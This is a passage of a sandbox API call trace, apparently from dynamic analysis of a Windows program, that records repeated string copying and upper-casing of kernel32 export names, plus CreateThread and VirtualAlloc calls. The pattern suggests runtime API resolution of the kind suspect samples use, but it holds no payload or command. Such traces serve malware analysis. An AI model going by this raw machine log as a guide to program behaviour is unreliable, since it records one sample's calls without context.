out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0048.041] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0048.041] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0048.041] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0048.041] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0048.042] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0048.042] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0048.042] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0048.042] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0048.042] lstrlenA (lpString="COPYCONTEXT") returned 11 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0048.042] lstrlenA (lpString="COPYFILEA") returned 9 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0048.042] lstrlenA (lpString="COPYFILEEXA") returned 11 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0048.042] lstrlenA (lpString="COPYFILEEXW") returned 11 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0048.042] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0048.042] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0048.042] lstrlenA (lpString="COPYFILEW") returned 9 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0048.042] lstrlenA (lpString="COPYLZFILE") returned 10 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0048.042] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0048.042] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0048.042] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0048.042] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0048.042] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0048.042] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0048.042] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0048.042] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0048.043] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0048.043] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0048.043] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0048.043] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0048.043] lstrlenA (lpString="CREATEEVENTA") returned 12 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0048.043] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0048.043] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0048.043] lstrlenA (lpString="CREATEEVENTW") returned 12 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0048.043] lstrlenA (lpString="CREATEFIBER") returned 11 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0048.043] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0048.043] lstrlenA (lpString="CREATEFILEA") returned 11 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0048.043] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0048.043] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0048.043] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0048.043] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0048.043] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0048.043] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0048.043] lstrlenA (lpString="CREATEFILEW") returned 11 [0048.043] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0048.044] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0048.044] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0048.044] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0048.044] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0048.044] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0048.044] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0048.044] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0048.044] lstrlenA (lpString="CREATEJOBSET") returned 12 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0048.044] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0048.044] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0048.044] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0048.044] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0048.044] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0048.052] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0048.052] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0048.052] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0048.052] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0048.052] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0048.052] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0048.052] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0048.052] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0048.052] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0048.052] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0048.052] lstrlenA (lpString="CREATEPIPE") returned 10 [0048.052] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0048.052] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0048.052] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0048.052] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0048.052] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0048.052] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0048.053] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0048.053] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0048.053] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0048.053] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0048.053] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0048.053] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0048.053] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0048.053] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0048.053] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0048.053] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0048.053] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0048.053] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0048.053] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0048.053] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0048.053] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0048.053] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0048.053] lstrcpyA (in: lpString1=0xc9e2e8, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0048.053] lstrlenA (lpString="CREATETHREAD") returned 12 [0048.054] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9ea00, lpParameter=0x370000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0048.055] VirtualAlloc (lpAddress=0x0, dwSize=0x210, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0048.058] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x440000 [0048.058] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0048.064] lstrlenA (lpString="kernel32.dll") returned 12 [0048.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0048.064] lstrcpyA (in: lpString1=0xc986e4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0048.064] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0048.064] lstrcpyA (in: lpString1=0xc986e4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0048.064] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0048.064] lstrcpyA (in: lpString1=0xc986e4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0048.064] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0048.064] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0048.064] lstrlenA (lpString="ADDATOMA") returned 8 [0048.064] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0048.064] lstrlenA (lpString="ADDATOMW") returned 8 [0048.064] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0048.065] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0048.065] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0048.065] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0048.065] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0048.065] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0048.065] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0048.065] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0048.065] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0048.065] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0048.065] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0048.065] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0048.065] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0048.065] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0048.065] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0048.065] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0048.065] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0048.065] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0048.065] lstrcpyA (in: lpString1=0xc986e4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0048.066] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0048.066] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0048.066] lstrlenA (lpString="BACKUPREAD") returned 10 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0048.066] lstrlenA (lpString="BACKUPSEEK") returned 10 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0048.066] lstrlenA (lpString="BACKUPWRITE") returned 11 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0048.066] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0048.066] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0048.066] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0048.066] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0048.066] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0048.066] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0048.066] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0048.066] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0048.066] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0048.066] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0048.066] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0048.066] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0048.066] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0048.066] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0048.066] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0048.067] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0048.067] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0048.067] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0048.067] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0048.067] lstrcpyA (in: lpString1=0xc986e4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0048.067] lstrlenA 